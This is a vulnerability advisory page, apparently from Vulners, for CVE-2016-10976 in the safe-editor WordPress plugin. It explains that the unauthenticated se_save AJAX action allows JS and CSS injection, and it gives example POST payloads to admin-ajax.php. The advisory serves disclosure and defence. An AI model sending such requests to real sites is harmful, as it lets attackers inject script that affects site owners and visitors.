Lucene search
safe-editor <= 1.1 - Unauthenticated CSS/JS-injection
Unsafe CSS/JS-injection in safe-editor v1.
Show more
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | CVE-2016-10976 | 17 Sep 201915:15 | β | nvd |
 | CVE-2016-10976 | 22 May 202509:07 | β | redhatcve |
 | CVE-2016-10976 | 17 Sep 201915:15 | β | cve |
 | safe-editor <= 1.1 - Unauthenticated CSS/JS-injection | 6 May 201600:00 | β | wpvulndb |
 | CVE-2016-10976 | 17 Sep 201914:05 | β | cvelist |
 | Authentication flaw | 17 Sep 201915:15 | β | prion |
 | Safe Editor Plugin < 1.2 - CSS/JS-injection | 7 Nov 202407:40 | β | nuclei |
| Source | Link |
|---|---|
| plugins | www.plugins.trac.wordpress.org/changeset |
In the file "index.php" (in root folder) on line 188 and 189 you can see that both private and public ajax-hooks are called and is referencing to the function "se_save".
This function does not do any authentication check or string sanitizing. Therefore you can inject whatever you want where the "wp_footer" and "wp_head" is called. With the use of for example cUrl or the chromeapp Postman this can be exploited with ease.
Example:
URL: http://www.site.com/wp-admin/admin-ajax.php
(Postdata displayed in JSON)
# JS injection
{
type: 'js',
data: 'alert("Hello world!");',
action: 'se_save'
}
# CSS injection
{
type: 'css',
data: 'body { display: none !important; }',
action: 'se_save'
}Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo06 May 2016 00:00Current
6.3Medium risk
Vulners AI Score6.3
EPSS0.02444